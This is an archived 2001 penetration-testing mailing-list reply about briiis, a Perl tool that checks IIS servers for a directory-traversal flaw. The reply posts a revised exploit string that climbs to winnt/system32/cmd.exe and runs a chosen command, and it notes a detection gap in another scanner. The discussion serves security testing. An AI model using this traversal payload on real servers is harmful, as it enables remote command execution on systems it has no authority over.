Penetration Testing mailing list archives
Re: iXsecurity.tool.briiis.3.02
From: Nicolas Gregoire <nicolas.gregoire () 7thzone com>
Date: Wed, 13 Jun 2001 18:49:25 +0200
ian.vitek () ixsecurity com wrote :
Briiis is a tool for testing web servers for "/" encoding break out from web root vulnerability from an executable directory.
Your tool doesn't find all vulnerable hosts.
The "exploit string" (ie. $explstr in the programm) doesn't contain (in
some cases) enough "../" and can't be used to access up to c:\
Here are the modifications I did to your toy :
OLD LINE :
$explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..${opt_F}winnt/system32/cmd.exe?/c+$opt_c"
if ($opt_c);
NEW LINE :
$explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F../winnt/system32/cmd.exe?/c+$opt_c"
if ($opt_c);
Thanks for the list of directories, I was looking for a good one.
NB : last time I checked it, the unicoder.pl tool from HD Moore couldn't
find non-english vulnerable versions of IIS (it is looking for
"Directory of" in the returned content and it's, for exemple,
"RĂ©pertoire de" in french).
Please excuse my poor english.
Nicob
Current thread:
- iXsecurity.tool.briiis.3.02 ian . vitek (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 Nicolas Gregoire (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 H D Moore (Jun 13)
- <Possible follow-ups>
- RE: iXsecurity.tool.briiis.3.02 Colby Rice (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 Sigtrap (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 Nicolas Gregoire (Jun 14)
- Re: iXsecurity.tool.briiis.3.02 Alex Butcher (Jun 15)
- Re: iXsecurity.tool.briiis.3.02 Nicolas Gregoire (Jun 13)